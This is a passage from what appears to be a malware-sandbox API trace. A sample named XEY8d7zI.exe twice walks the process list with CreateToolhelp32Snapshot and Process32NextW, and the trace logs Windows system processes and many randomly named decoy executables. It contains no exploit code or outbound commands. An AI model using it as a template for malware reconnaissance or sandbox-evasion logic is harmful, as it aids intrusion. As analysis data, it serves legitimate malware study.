hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0148.074] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0148.075] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, 
th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0148.076] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0148.076] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0148.077] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0148.078] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0148.080] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0148.081] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0148.082] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.083] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.083] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.085] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.086] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.087] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0148.088] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.092] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.093] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0148.094] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.096] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0148.097] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0148.099] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0148.189] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0148.190] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.193] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0148.195] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0148.196] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0148.200] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0148.201] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0148.205] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0148.208] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0148.210] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0148.211] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0148.213] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0148.214] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0148.216] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0148.217] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0148.219] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0148.220] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0148.222] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0148.223] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0148.224] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0148.274] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0148.275] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0148.277] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0148.278] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.280] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0148.282] CloseHandle (hObject=0xc4) returned 1 [0148.282] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0148.291] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0148.292] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0148.293] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0148.296] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, 
dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0148.297] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0148.298] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0148.299] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0148.299] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0148.300] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0148.301] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0148.302] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="svchost.exe")) returned 1 [0148.303] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.304] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.305] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.309] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.310] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0148.311] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.312] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="svchost.exe")) returned 1 [0148.313] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0148.314] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.316] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0148.317] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0148.318] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0148.320] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0148.335] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="svchost.exe")) returned 1 [0148.336] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0148.338] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0148.339] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0148.341] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0148.342] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0148.343] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0148.345] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0148.346] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0148.348] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0148.349] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0148.351] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 